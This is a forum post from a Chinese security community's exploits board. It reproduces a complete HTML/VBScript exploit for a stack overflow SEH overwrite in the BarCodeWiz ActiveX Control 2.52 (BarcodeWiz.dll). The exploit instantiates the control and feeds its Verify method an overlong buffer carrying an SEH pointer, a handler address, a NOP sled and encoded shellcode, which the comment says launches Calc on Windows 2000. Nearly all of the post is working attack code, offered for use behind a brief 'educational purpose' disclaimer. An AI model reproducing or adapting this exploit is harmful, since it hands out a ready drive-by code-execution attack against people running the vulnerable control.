BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll) SEH Overwrite Exploit

ring04h

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员社区主管

帖子: 3923
精华: 128
积分: 209640
阅读权限: 200
性别: 男
在线时间: 1096 小时
注册时间: 2007-10-23
最后登录: 2008-7-23

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-5-12 00:14 只看该作者

BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll) SEH Overwrite Exploit

复制内容到剪贴板

代码:

<!--



 ===============================================================================================

     BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll)Stack Overflow SEH Overwrite Exploit

                     By Parveen Vashishtha

 ==============================================================================================  

    

 Date : 09-05-2007

 

  Open Calc on 2K

 

 

 PS. This was written for educational purpose. Use it at your own risk.Author will be not be

   responsible for any damage.

 

 Thanks to Metasploit and Stroke 



-->

<html>



<body>



<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6" > </OBJECT>



<script language="vbscript">









shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")

shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")

shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")

shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")

shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")

shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")

shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")

shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")

shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")

shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")

shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")





nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")          



pointer_to_seh=unescape("%eb%06%90%90")



seh_handler=unescape("%a9%11%02%75")





targetFile = "C:\Program Files\BarCodeWiz ActiveX Demo\DLL\BarcodeWiz.dll"

prototype = "Function Verify ( ByVal Barcode As String ) As Boolean"

memberName = "Verify"

progid   = "BARCODEWIZLib.BarCodeWiz"

argCount  = 1



arg1=String(3256,"A")



arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop



target.Verify arg1



 



</script>

</body>

</html>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll) SEH Overwrite Exploit